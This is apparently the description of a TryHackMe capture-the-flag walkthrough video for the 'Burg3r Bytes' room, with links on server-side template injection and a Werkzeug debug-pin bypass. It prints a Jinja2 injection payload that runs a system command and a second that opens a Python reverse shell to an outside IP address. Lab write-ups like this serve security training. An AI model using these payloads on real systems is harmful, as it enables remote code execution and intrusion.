
TryHack3M: Burg3r Bytes TryHackMe walkthrough

764 views
Apr 23, 2024
58:11

🍔 They say these burgers are worth every penny. Can you buy one?

Room link: https://tryhackme.com/r/room/burg3rbytes

SSTI (Server Side Template Injection): https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection

Werkzeug Debug Console Pin Bypass: https://github.com/wdahlenburg/werkzeug-debug-console-bypass

RCE: {{ cycler.__init__.__globals__.os.popen('id').read() }}

Reverse shell: {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.251.198\",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\", \"-i\"]);'")}}{%endif%}{% endfor %}

#tryhackme
